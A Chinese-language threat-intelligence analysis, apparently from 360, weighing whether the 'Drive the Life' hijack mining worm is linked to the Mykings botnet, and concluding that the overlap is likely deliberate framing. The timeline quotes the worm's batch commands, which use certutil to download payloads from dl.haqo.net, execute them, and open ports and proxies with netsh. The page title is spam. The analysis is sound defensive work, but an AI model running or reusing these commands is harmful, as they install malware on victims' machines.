压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

背景

近期360威脅情報中心發現劫持“驅動人生”的挖礦蠕蟲再次活躍并做出了預警（詳情可以參見《劫持“驅動人生”的挖礦蠕蟲再次活躍》一文），在分析團伙的新活動時360威脅情報中心發現了一些涉及到Mykings家族活動的現象，但未能得出確定性的結論，在此分享出來供業界參考，希望能補充更多維度的信息共同研判。

網絡基礎設施的重疊

在對“驅動人生”劫持事件下載木馬的域名dl.haqo.net進行關聯分析時，我們注意到其中一個子域名js.haqo.net，在360威脅情報中心的ALPHA平臺中被打上Mykings的標簽，該域名解析到IP 81.177.135.35 。

查看81.177.135.35的信息，發現該IP在2018年-2019年的時間段基本上是被Mykings家族所使用，下圖可以看到此IP綁定的域名幾乎全是Mykings使用的C&C，域名格式為js.xxx.xxx，與Mykings的一些子域名格式一致，并且一直到2019年1月24日Mykings的眾多域名依然解析到此IP上。而在2019年1月09日，攻擊驅動人生的幕后團伙所使用的域名js.haqo.net也解析到了這個IP。

為了進一步發現更多的關聯，使用ALPHA平臺的威脅關聯分析功能，可以清晰地看到haqo.net下面的三個子域名與Mykings的部分域名之間的關系：

在對兩個事件涉及到的C&C域名進行關聯分析時，除了觀察域名是否解析到相同的IP，還需要確認使用同一個IP的時間段是否一致，如果時間段有重疊，共用基礎設施的可能性加大。我們整理了攻擊驅動人生的團伙與Mykings使用上面提到的三個IP的時間段，如下表所示，可以發現兩者使用同一IP的時間段是有所重疊的，顯示出更強的關聯度。

我們不僅看到了域名解析到IP的重疊情況，還注意到了兩個事件相似的HTTP請求：js.haqo.net在2018-12-25首次解析到IP 81.177.135.35上，接著有樣本請求了hxxp://js.haqo.net:280/v.sct；2018-12-26日，Mykings的js.mys2016.info也解析都該IP上，有樣本請求了hxxp://js.mys2016.info:280/v.sct。看起來兩個事件的不同域名同一個時間段解析到同一個IP上，并且使用了同一個端口280，連URL的Path都一樣: /v.sct 。

Mykings訪問hxxp://js.mys2016.info:280/v.sct這個URL的樣本如下：

可疑的關聯性

基于以上的網絡基礎設施的重疊和訪問請求的相似性，我們是否就可以得到“驅動人生”劫持事件與Mykings背后的團伙是同一個呢？我們的觀點是：不一定。

Mykings會配合云端機制發起掃描然后嘗試掃描和入侵，因此被捕獲的樣本量相當多; 驅動人生事件的永恒之藍挖礦蠕蟲也會主動進行傳播，被捕獲的樣本量也不少。但是， hxxp://js.haqo.net:280/v.sct這個鏈接指向文件無法下載，2018-12-25日VT上首次出現這個URL時，甚至連TCP連接都沒能建立起來，網絡上也并沒有留存任何請求了這個URL的樣本或者URL的相應數據。

而VT對于URL的檢測是不可靠的（特別是沒有獲取到相應數據的時候），任何人都可以構造一個完全不存在URL提交檢測，這樣在搜索對應的域名/IP時，URL或者Downloaded Files將會顯示出被構造的URL。

例如隨意輸入hxxp://js[.]haqo.net:6252/admin.asp，盡管請求沒成功什么數據也沒有返回，依然有三個引擎產生了告警。而再次搜索js.haqo.net時，關聯URL中已然多了一條: hxxp://js[.]haqo.net:6252/admin.asp

所以盡管看似“驅動人生”劫持木馬的幕后團伙跟Mykings有千絲萬縷的關系，但是并沒有一個確切的能夠提供實錘的證據表明他們是同一個團伙或者兩個團伙有交流溝通：盡管一些沒有被使用的子域名解析到了Mykings掌握的IP上，而且使用的時間段有所重合；兩個團伙已知的惡意代碼沒有太多的相似之處；VT上js.haqo.net的某個URL構造得與Mykings相關性非常強，但卻沒有實際返回的數據可以用來確認“驅動人生”劫持木馬利用到了Mykings的IP對應的服務器資源。

時間線

目前360對于“驅動人生”劫持木馬事件做了一系列的分析，在這里簡單總結一下“驅動人生”時間的時間線：

2018年12月14日

驅動人生攻擊爆發，內網傳播用的永恒之藍漏洞，下載的payload地址：http://dl.haqo.net/dl.exe

當時的永恒之藍的攻擊模塊的BAT內容如下：

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

而從該地址下載的dl.exe（f79cb9d2893b254cc75dfb7f3e454a69）的C2地址為：

2018年12月16日

各大安全廠商曝光該攻擊，攻擊逐步停止。

2018年12月27日

永恒之藍攻擊模塊攻擊成功后在目標機器上運行的bat的內容變更下一階段的payload地址

從http://dl.haqo.net/dl.exe改成了http://dl.haqo.net/dll.exe；

certutil -urlcache -split -f http://dl.haqo.net/dll.exe c:\installs.exe

netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53

netsh firewall add portopening tcp 65532 DNS2

c:\windows\temp\cm.exe /c c:\installs.exe

taskkill /F /IM cmd.exe

而該地址下載回來的樣本（f9144118127ff29d4a49a30b242ceb55）的C2地址為以下3個，增加了http://img.minicen.ga/i.png，而該域名為免費域名，注冊地址為：freenom.com

2019年1月23日

http://dl.haqo.net/dll.exe的地址的樣本變為：

59b18d6146a2aa066f661599c496090d，下圖為該樣本的傳播量：

該樣本的C2地址變為下圖的3個域名，增加了o.beahh.com：

其中 beahh.com域名是2019年1月16日剛注冊的。

總結

360威脅情報中心基于自有的大數據和威脅情報平臺對入侵驅動人生的幕后團伙進行了關聯分析，發現其所用的IP與Mykings事件團伙的部分IP重合，并且使用時間的段重合，甚至連樣本所訪問的URL格式、端口都一樣。但是兩個團伙已知的惡意代碼沒有太多的相似之處，格式高度一致的URL沒有實際上的請求和響應數據，由于VT不可靠的URL檢測機制，該URL是否實際存在也是個疑問。

基于看到的事實，有兩個猜想值得關注：1、入侵“驅動人生”的幕后黑手與Mykings事件團伙存在聯系，甚至可能是同一個團伙。2、“驅動人生”木馬的團伙在有意識地積極栽贓嫁禍給Mykings團伙。我們的觀點傾向于后者，360威脅情報中心會持續保持跟蹤，基于新發現的事實調整自己的看法，也希望安全業界分享自己的發現。

參考

360對劫持“驅動人生”的挖礦蠕蟲分析報告系列詳情如下表：

https://cert.360.cn/warning/detail?id=57cc079bc4686dd09981bf034130f1c9

https://ti.360.net/blog/articles/an-attack-of-supply-chain-by-qudongrensheng/

https://weibo.com/ttarticle/p/show?id=2309404318990783612243

https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247486576&idx=1&sn=dc5ff6a05fac06608365823173d17dae&chksm=ea65fb07dd1272113e4890dd284d19e945b4e0ae803f75671ee46cb3fbd42c54fa9170caac86&scene=0&xtrack=1#rd

https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/

原文鏈接：https://www.anquanke.com/post/id/170493